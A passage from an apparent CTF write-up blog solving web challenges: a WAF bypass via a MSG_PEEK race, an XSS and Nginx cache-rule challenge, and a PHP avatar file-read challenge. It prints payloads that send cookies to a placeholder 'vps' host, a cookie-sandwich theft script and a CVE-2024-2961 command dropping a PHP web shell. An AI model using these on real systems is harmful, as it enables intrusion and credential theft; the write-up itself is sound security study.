class="string">'([0-9a-f]+)-([0-9a-f]+)'</span>,line)</span><br><span class="line"> <span class="comment"># Match the address range with a regex: addresses are hex digits [0-9a-f]. re.search returns a re.Match object; the parentheses form groups so the result can be read with group().</span></span><br><span class="line"> start = <span class="built_in">int</span>(addr.group(<span class="number">1</span>),<span class="number">16</span>) <span class="comment"># convert the hex string to a decimal integer, the format the start (offset) parameter expects</span></span><br><span class="line"> end = <span class="built_in">int</span>(addr.group(<span class="number">2</span>),<span class="number">16</span>) <span class="comment"># convert the hex string to a decimal integer, the format the end parameter expects</span></span><br><span 
class="line"> <span class="built_in">print</span>(start,end)</span><br><span class="line"> <span class="built_in">print</span>(end-start)</span><br></pre></td></tr></table></figure><p>Since it was not clear which segment the flag was in, I computed the values for every segment and tried them by hand.</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20260111203517430.png" alt="image-20260111203517430"></p><p>In the end it turned out to be in the /usr/local/lib/python3.12/lib-dynload/select.cpython-312-x86_64-linux-gnu.so segment.</p><h4 id="预期"><a href="#预期" class="headerlink" title="预期"></a>Intended solution</h4><p>The code performs two recv calls; the one relevant to the WAF is this part:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">initial_data = conn.recv(<span class="number">256</span>, socket.MSG_PEEK)</span><br><span class="line"><span class="keyword">if</span> <span class="built_in">any</span>(term <span class="keyword">in</span> initial_data.lower() <span class="keyword">for</span> term <span class="keyword">in</span> FORBIDDEN):</span><br><span class="line"> conn.sendall(<span class="string">b"HTTP/1.1 403 Forbidden\r\n\r\nSuspicious request pattern detected."</span>)</span><br><span class="line"> conn.close()</span><br><span class="line"> <span class="keyword">continue</span></span><br></pre></td></tr></table></figure><p>It uses MSG_PEEK, which only looks at the data without taking it out of the socket buffer.</p><p>In other words the data stays in the receive buffer; the real read happens in handle_connection, and once the data is read it is removed from the buffer.</p><p>Before that read, if the request went down the log branch, the log is written first and only then is the data read. If factor is set high, the process spends a while computing the hash and stalls there, so GET /?log=1&factor=100000 keeps sitting in the buffer. If, after the MSG_PEEK check and before the buffer has been consumed, more data is sent immediately, then because the process has already passed the WAF stage, the newly sent /../../../proc/self/maps skips the WAF check and is appended straight after it, so what actually ends up in the buffer is GET /?log=1&factor=100000/../../../proc/self/maps </p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span 
class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">host = <span class="string">'localhost'</span></span><br><span class="line">port = <span class="number">1337</span></span><br><span class="line"></span><br><span class="line">remote1 = remote(host, port)</span><br><span class="line">remote1.send(<span class="string">b'GET /?log=1&factor=100000'</span>)</span><br><span class="line">time.sleep(<span class="number">0.01</span>)</span><br><span class="line">remote1.send(<span class="string">f'/../../../../proc/self/maps'</span>.encode())</span><br><span class="line">resp = remote1.recv()</span><br><span class="line"><span class="built_in">print</span>(resp)</span><br></pre></td></tr></table></figure><p>This is how the WAF is bypassed to read maps; after that it is the normal procedure again.</p><h3 id="Unfinished"><a href="#Unfinished" class="headerlink" title="Unfinished"></a>Unfinished</h3><p>xss</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span 
class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span 
class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span 
class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask, request, render_template, redirect, url_for, flash, render_template_string, make_response</span><br><span class="line"><span class="keyword">from</span> flask_login <span class="keyword">import</span> LoginManager, UserMixin, login_user, logout_user, current_user, login_required</span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">from</span> markupsafe <span class="keyword">import</span> escape</span><br><span class="line"><span class="keyword">from</span> playwright.sync_api <span class="keyword">import</span> sync_playwright</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line">app.config[<span class="string">'SECRET_KEY'</span>] = <span class="string">'your-secret-key-here'</span></span><br><span class="line"></span><br><span class="line">login_manager = LoginManager()</span><br><span class="line">login_manager.init_app(app)</span><br><span class="line">login_manager.login_view = <span class="string">'login'</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">User</span>(<span class="title class_ inherited__">UserMixin</span>):</span><br><span class="line"> <span class="keyword">def</span> <span class="title function_">__init__</span>(<span class="params">self, <span class="built_in">id</span>, username, password, bio=<span 
class="string">""</span></span>):</span><br><span class="line"> <span class="variable language_">self</span>.<span class="built_in">id</span> = <span class="built_in">id</span></span><br><span class="line"> <span class="variable language_">self</span>.username = username</span><br><span class="line"> <span class="variable language_">self</span>.password = password</span><br><span class="line"> <span class="variable language_">self</span>.bio = bio</span><br><span class="line">admin_password = os.urandom(<span class="number">12</span>).<span class="built_in">hex</span>()</span><br><span class="line"></span><br><span class="line">USERS_DB = {<span class="string">'admin'</span>: User(<span class="built_in">id</span>=<span class="number">1</span>, username=<span class="string">'admin'</span>, password=admin_password)}</span><br><span class="line">USER_ID_COUNTER = <span class="number">1</span></span><br><span class="line"></span><br><span class="line"><span class="meta">@login_manager.user_loader</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">load_user</span>(<span class="params">user_id</span>):</span><br><span class="line"> <span class="keyword">for</span> user <span class="keyword">in</span> USERS_DB.values():</span><br><span class="line"> <span class="keyword">if</span> <span class="built_in">str</span>(user.<span class="built_in">id</span>) == user_id:</span><br><span class="line"> <span class="keyword">return</span> user</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">None</span></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">'/'</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">index</span>():</span><br><span class="line"> <span class="keyword">return</span> render_template(<span 
class="string">'index.html'</span>)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">'/register'</span>, methods=[<span class="string">'GET'</span>, <span class="string">'POST'</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">register</span>():</span><br><span class="line"> <span class="keyword">global</span> USER_ID_COUNTER</span><br><span class="line"> <span class="keyword">if</span> request.method == <span class="string">'POST'</span>:</span><br><span class="line"> username = request.form[<span class="string">'username'</span>]</span><br><span class="line"> <span class="keyword">if</span> username <span class="keyword">in</span> USERS_DB:</span><br><span class="line"> flash(<span class="string">'Username already exists.'</span>)</span><br><span class="line"> <span class="keyword">return</span> redirect(url_for(<span class="string">'register'</span>))</span><br><span class="line"> </span><br><span class="line"> USER_ID_COUNTER += <span class="number">1</span></span><br><span class="line"> new_user = User(</span><br><span class="line"> <span class="built_in">id</span>=USER_ID_COUNTER,</span><br><span class="line"> username=username,</span><br><span class="line"> password=request.form[<span class="string">'password'</span>]</span><br><span class="line"> )</span><br><span class="line"> USERS_DB[username] = new_user</span><br><span class="line"> login_user(new_user)</span><br><span class="line"> response = make_response(redirect(url_for(<span class="string">'index'</span>)))</span><br><span class="line"> response.set_cookie(<span class="string">'ticket'</span>, <span class="string">'your_ticket_value'</span>)</span><br><span class="line"> <span class="keyword">return</span> response</span><br><span class="line"> <span class="keyword">return</span> render_template(<span 
class="string">'register.html'</span>)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">'/login'</span>, methods=[<span class="string">'GET'</span>, <span class="string">'POST'</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">login</span>():</span><br><span class="line"> <span class="keyword">if</span> request.method == <span class="string">'POST'</span>:</span><br><span class="line"> username = request.form[<span class="string">'username'</span>]</span><br><span class="line"> password = request.form[<span class="string">'password'</span>]</span><br><span class="line"> user = USERS_DB.get(username)</span><br><span class="line"> <span class="keyword">if</span> user <span class="keyword">and</span> user.password == password:</span><br><span class="line"> login_user(user)</span><br><span class="line"> <span class="keyword">return</span> redirect(url_for(<span class="string">'index'</span>))</span><br><span class="line"> flash(<span class="string">'Invalid credentials.'</span>)</span><br><span class="line"> <span class="keyword">return</span> render_template(<span class="string">'login.html'</span>)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">'/logout'</span></span>)</span></span><br><span class="line"><span class="meta">@login_required</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">logout</span>():</span><br><span class="line"> logout_user()</span><br><span class="line"> <span class="keyword">return</span> redirect(url_for(<span class="string">'index'</span>))</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">'/profile'</span>, methods=[<span class="string">'GET'</span>, <span 
class="string">'POST'</span>]</span>)</span></span><br><span class="line"><span class="meta">@login_required</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">profile</span>():</span><br><span class="line"> <span class="keyword">if</span> request.method == <span class="string">'POST'</span>:</span><br><span class="line"> current_user.bio = request.form[<span class="string">'bio'</span>]</span><br><span class="line"> <span class="built_in">print</span>(current_user.bio)</span><br><span class="line"> <span class="keyword">return</span> redirect(url_for(<span class="string">'index'</span>))</span><br><span class="line"> <span class="keyword">return</span> render_template(<span class="string">'profile.html'</span>)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">'/ticket'</span>, methods=[<span class="string">'GET'</span>, <span class="string">'POST'</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">ticket</span>():</span><br><span class="line"> <span class="keyword">if</span> request.method == <span class="string">'POST'</span>:</span><br><span class="line"> ticket = request.form[<span class="string">'ticket'</span>]</span><br><span class="line"> response = make_response(redirect(url_for(<span class="string">'index'</span>)))</span><br><span class="line"> response.set_cookie(<span class="string">'ticket'</span>, ticket)</span><br><span class="line"> <span class="keyword">return</span> response</span><br><span class="line"> <span class="keyword">return</span> render_template(<span class="string">'ticket.html'</span>)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">"/view"</span>, methods=[<span class="string">"GET"</span>]</span>)</span></span><br><span class="line"><span 
class="meta">@login_required</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">view_user</span>():</span><br><span class="line"> <span class="string">"""</span></span><br><span class="line"><span class="string"> # I found a bug in it.</span></span><br><span class="line"><span class="string"> # Until I fix it, I've banned /api/bio/. Have fun :)</span></span><br><span class="line"><span class="string"> """</span></span><br><span class="line"> username = request.args.get(<span class="string">"username"</span>,default=current_user.username)</span><br><span class="line"> visit_url(<span class="string">f"http://localhost/api/bio/<span class="subst">{username}</span>"</span>)</span><br><span class="line"> template = <span class="string">f"""</span></span><br><span class="line"><span class="string"> {{% extends "base.html" %}}</span></span><br><span class="line"><span class="string"> {{% block title %}}success{{% endblock %}}</span></span><br><span class="line"><span class="string"> {{% block content %}}</span></span><br><span class="line"><span class="string"> <h1>bot will visit your bio</h1></span></span><br><span class="line"><span class="string"> <p style="margin-top: 1.5rem;"><a href="{{{{ url_for('index') }}}}">Back to Home</a></p></span></span><br><span class="line"><span class="string"> {{% endblock %}}</span></span><br><span class="line"><span class="string"> """</span></span><br><span class="line"> <span class="keyword">return</span> render_template_string(template)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">"/api/bio/<string:username>"</span>, methods=[<span class="string">"GET"</span>]</span>)</span></span><br><span class="line"><span class="meta">@login_required</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">get_user_bio</span>(<span 
class="params">username</span>):</span><br><span class="line"> <span class="keyword">if</span> <span class="keyword">not</span> current_user.username == username:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">"Unauthorized"</span>, <span class="number">401</span></span><br><span class="line"> user = USERS_DB.get(username)</span><br><span class="line"> <span class="keyword">if</span> <span class="keyword">not</span> user:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">"User not found."</span>, <span class="number">404</span></span><br><span class="line"> <span class="keyword">return</span> user.bio</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">visit_url</span>(<span class="params">url</span>):</span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> flag_value = os.environ.get(<span class="string">'FLAG'</span>, <span class="string">'flag{fake}'</span>)</span><br><span class="line"></span><br><span class="line"> <span class="keyword">with</span> sync_playwright() <span class="keyword">as</span> p:</span><br><span class="line"> browser = p.chromium.launch(headless=<span class="literal">True</span>, args=[<span class="string">"--no-sandbox"</span>])</span><br><span class="line"> context = browser.new_context()</span><br><span class="line"></span><br><span class="line"> context.add_cookies([{</span><br><span class="line"> <span class="string">'name'</span>: <span class="string">'flag'</span>,</span><br><span class="line"> <span class="string">'value'</span>: flag_value,</span><br><span class="line"> <span class="string">'domain'</span>: <span class="string">'localhost'</span>,</span><br><span class="line"> <span class="string">'path'</span>: <span class="string">'/'</span>,</span><br><span class="line"> <span class="string">'httponly'</span>: <span 
class="literal">True</span></span><br><span class="line"> }])</span><br><span class="line"></span><br><span class="line"> page = context.new_page()</span><br><span class="line"> page.goto(<span class="string">"http://localhost/login"</span>, timeout=<span class="number">5000</span>)</span><br><span class="line"> page.fill(<span class="string">"input[name='username']"</span>, <span class="string">"admin"</span>)</span><br><span class="line"> page.fill(<span class="string">"input[name='password']"</span>, admin_password)</span><br><span class="line"> page.click(<span class="string">"input[name='submit']"</span>)</span><br><span class="line"> page.wait_for_timeout(<span class="number">3000</span>)</span><br><span class="line"> page.goto(url, timeout=<span class="number">5000</span>)</span><br><span class="line"> page.wait_for_timeout(<span class="number">5000</span>)</span><br><span class="line"> browser.close()</span><br><span class="line"></span><br><span class="line"> <span class="keyword">except</span> Exception <span class="keyword">as</span> e:</span><br><span class="line"> <span class="built_in">print</span>(<span class="string">f"Bot error: <span class="subst">{<span class="built_in">str</span>(e)}</span>"</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">"__main__"</span>:</span><br><span class="line"> app.run(host=<span class="string">'0.0.0.0'</span>, port=<span class="number">5000</span>)</span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span 
class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line">user www-data;</span><br><span class="line">worker_processes auto;</span><br><span class="line">pid /var/run/nginx.pid;</span><br><span class="line"></span><br><span class="line">events {</span><br><span class="line"> worker_connections 1024;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">http {</span><br><span class="line"> proxy_cache_path /var/cache/nginx levels=1:2 keys_zone=static_cache:10m max_size=1g inactive=60m;</span><br><span class="line"></span><br><span class="line"> include /etc/nginx/mime.types;</span><br><span class="line"> default_type application/octet-stream;</span><br><span class="line"></span><br><span class="line"> server {</span><br><span class="line"> listen 80 default_server;</span><br><span class="line"> server_name _;</span><br><span class="line"></span><br><span class="line"> location / {</span><br><span class="line"> proxy_pass http://127.0.0.1:5000;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> location /api/bio/ {</span><br><span class="line"> return 403;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> location ~ \.(css|js)$ {</span><br><span class="line"> proxy_pass http://127.0.0.1:5000;</span><br><span class="line"> proxy_ignore_headers Vary;</span><br><span class="line"> proxy_cache static_cache;</span><br><span class="line"> proxy_cache_valid 200 10m;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">location /api/bio/ {</span><br><span class="line"> return 403;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">context.add_cookies([{</span><br><span class="line"> 'name': 'flag',</span><br><span class="line"> 'value': flag_value,</span><br><span class="line"> 'domain': 'localhost',</span><br><span class="line"> 'path': '/',</span><br><span class="line"> 'httponly': True</span><br><span class="line">}])</span><br></pre></td></tr></table></figure><p>Amazingly, httpOnly is written with the wrong capitalisation here (), so the flag is simply sent out along with the cookie and the normal approach works.</p><h4 id="非预期-1"><a href="#非预期-1" class="headerlink" title="非预期"></a>Unintended solution</h4><p>/api/bio/ cannot be reached by us or by the bot.</p><p>But further down it also says:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">location ~ \.(css|js)$ {</span><br><span class="line"> proxy_pass http://127.0.0.1:5000;</span><br><span class="line"> proxy_cache static_cache;</span><br><span class="line"> ...</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>The flaw is that in Nginx a regular-expression location (<code>~</code>) usually takes priority over a plain string prefix match.</p><p>That is, if the request ends in .js or .css and matches that regex, the 403 on /api/bio/ is simply ignored.</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> <span class="keyword">not</span> current_user.username == username:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">"Unauthorized"</span>, <span class="number">401</span></span><br><span class="line"> user = USERS_DB.get(username)</span><br><span class="line"> <span class="keyword">if</span> <span class="keyword">not</span> user:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">"User not found."</span>, <span class="number">404</span></span><br><span class="line"> <span class="keyword">return</span> user.bio</span><br></pre></td></tr></table></figure><p>Only when logged in as 1.js can /api/bio/1.js be accessed.</p><p>Set the bio to our payload:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><script>fetch('http://vps/'+document.cookie);</script></span><br></pre></td></tr></table></figure><p>Because Nginx has proxy_cache configured, once /api/bio/1.js has been visited as 1.js, Nginx stores that URL in the cache.</p><p>Set up a listener on the server, then visit /view?username=1.js so the bot triggers this URL, which reads the flag out of the bot's cookie.</p><h4 id="预期-1"><a href="#预期-1" class="headerlink" title="预期"></a>Intended solution</h4><p>If httpOnly had been capitalised correctly:</p><p>Reference: <a href="https://portswigger.net/research/stealing-httponly-cookies-with-the-cookie-sandwich-technique">https://portswigger.net/research/stealing-httponly-cookies-with-the-cookie-sandwich-technique</a></p><p>The two-slices-of-bread-around-the-cheese 🧀 method ()</p><p>For compatibility with older standards, many parsers follow this logic when handling a Cookie value: if the value begins with a double quote ", it must read on to the next double quote before the value ends.</p><p>In other words, when the browser sends the HTTP request, if the value has been wrapped in double quotes</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ticket="start; flag=flag; aaa=end"</span><br></pre></td></tr></table></figure><p>the browser at most takes the value of ticket to be "start, the value of flag to be flag, and the value of aaa to be end"</p><p>But the backend parser does not see it that way.</p><p>When it reaches the first semicolon, it treats everything wrapped in the double quotes as one whole value, and the semicolons inside the quotes as ordinary content.</p><p>That is, the parser takes the value of ticket to be start; flag=flag; aaa=end, which bypasses httpOnly.</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">@app.route('/ticket', methods=['POST'])</span><br><span class="line">def ticket():</span><br><span class="line"> ticket_val = request.form['ticket'] # the attacker controls this</span><br><span class="line"> response = make_response(...)</span><br><span class="line"> response.set_cookie('ticket', ticket_val) # this is the key!</span><br><span class="line"> return response</span><br></pre></td></tr></table></figure><p>It is then read back out through this part's response.headers.get('Set-Cookie').</p><p>exp:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><script></span><br><span class="line">const url = new URL("http://localhost/ticket");</span><br><span class="line">document.cookie = `$Version=1; domain=${url.hostname}; path=${url.pathname};`;</span><br><span class="line">document.cookie = `ticket="test; domain=${url.hostname}; path=${url.pathname};`;</span><br><span class="line">document.cookie = `aaa=bbb"; domain=${url.hostname}; path=/;`;</span><br><span class="line">fetch("/ticket", {</span><br><span class="line"> credentials: 'include',</span><br><span class="line">}).then(response => {</span><br><span class="line"> return response.text();</span><br><span class="line">}).then(data => {</span><br><span class="line"> fetch("http://vps:23333/", {</span><br><span class="line"> method: "POST",</span><br><span class="line"> body: data,</span><br><span class="line"> });</span><br><span class="line">})</span><br><span class="line"></script></span><br></pre></td></tr></table></figure><h2 id="2024-N1-junior"><a href="#2024-N1-junior" class="headerlink" title="2024 N1 junior"></a>2024 N1 junior</h2><h3 id="Gavatar"><a href="#Gavatar" class="headerlink" title="Gavatar"></a>Gavatar</h3><p>(Memory again, memory again)</p><p>The challenge imitates an application that lets users upload and display their own avatar.</p><p>The vulnerable spot is here:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td
class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="keyword">require_once</span> <span class="string">'common.php'</span>;</span><br><span class="line"></span><br><span class="line"><span class="variable">$user</span> = <span class="title function_ invoke__">getCurrentUser</span>();</span><br><span class="line"><span class="keyword">if</span> (!<span class="variable">$user</span>) <span class="title function_ invoke__">header</span>(<span class="string">'Location: index.php'</span>);</span><br><span class="line"></span><br><span class="line"><span class="variable">$avatarDir</span> = <span class="keyword">__DIR__</span> . <span class="string">'/avatars'</span>;</span><br><span class="line"><span class="keyword">if</span> (!<span class="title function_ invoke__">is_dir</span>(<span class="variable">$avatarDir</span>)) <span class="title function_ invoke__">mkdir</span>(<span class="variable">$avatarDir</span>, <span class="number">0755</span>);</span><br><span class="line"></span><br><span class="line"><span class="variable">$avatarPath</span> = <span class="string">"<span class="subst">$avatarDir</span>/<span class="subst">{$user['id']}</span>"</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (!<span class="keyword">empty</span>(<span class="variable">$_FILES</span>[<span class="string">'avatar'</span>][<span class="string">'tmp_name'</span>])) {</span><br><span class="line"> <span class="variable">$finfo</span> = <span class="keyword">new</span> <span class="title function_ invoke__">finfo</span>(FILEINFO_MIME_TYPE);</span><br><span class="line"> <span class="keyword">if</span> (!<span class="title function_ invoke__">in_array</span>(<span class="variable">$finfo</span>-><span class="title function_ invoke__">file</span>(<span class="variable">$_FILES</span>[<span class="string">'avatar'</span>][<span class="string">'tmp_name'</span>]), [<span 
class="string">'image/jpeg'</span>, <span class="string">'image/png'</span>, <span class="string">'image/gif'</span>])) {</span><br><span class="line"> <span class="keyword">die</span>(<span class="string">'Invalid file type'</span>);</span><br><span class="line"> }</span><br><span class="line"> <span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$_FILES</span>[<span class="string">'avatar'</span>][<span class="string">'tmp_name'</span>], <span class="variable">$avatarPath</span>);</span><br><span class="line">} <span class="keyword">elseif</span> (!<span class="keyword">empty</span>(<span class="variable">$_POST</span>[<span class="string">'url'</span>])) {</span><br><span class="line"> <span class="variable">$image</span> = @<span class="title function_ invoke__">file_get_contents</span>(<span class="variable">$_POST</span>[<span class="string">'url'</span>]);</span><br><span class="line"> <span class="keyword">if</span> (<span class="variable">$image</span> === <span class="literal">false</span>) <span class="keyword">die</span>(<span class="string">'Invalid URL'</span>);</span><br><span class="line"> <span class="title function_ invoke__">file_put_contents</span>(<span class="variable">$avatarPath</span>, <span class="variable">$image</span>);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">header</span>(<span class="string">'Location: profile.php'</span>);</span><br></pre></td></tr></table></figure><p>The file_get_contents function gives an arbitrary file read: file:///etc/passwd is enough to read a file.</p><p>The hard part is that this challenge requires running the /readflag command to get the flag. Checking the PHP version, 8.3.4, we need to find a CVE.</p><p>CVE-2024-2961</p><p>The rough idea is:</p><p>1. Read /proc/self/maps to compute addresses</p><p>2. Read the specified file containing the address of the system function</p><p>3. Generate the PoC directly to achieve RCE</p><p>Then run a command on the Linux machine to obtain RCE:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python cnext-exploit.py http://localhost:8000 "echo PD89YCRfR0VUWzBdYD8+ | base64 -d > cmd.php"</span><br></pre></td></tr></table></figure><figure class="highlight 